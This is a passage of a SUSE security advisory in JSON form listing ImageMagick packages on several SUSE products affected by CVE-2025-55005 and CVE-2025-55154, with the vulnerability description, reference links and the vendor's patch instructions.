"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:01:34Z",
"details": "important"
}
],
"title": "CVE-2025-55005"
},
{
"cve": "CVE-2025-55154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55154"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-27 and 7.1.2-1, the magnified size calculations in ReadOneMNGIMage (in coders/png.c) are unsafe and can overflow, leading to memory corruption. This issue has been patched in versions 6.9.13-27 and 7.1.2-1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55154",
"url": "https://www.suse.com/security/cve/CVE-2025-55154"
},
{
"category": "external",
"summary": "SUSE Bug 1248078 for CVE-2025-55154",
"url": "https://bugzilla.suse.com/1248078"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
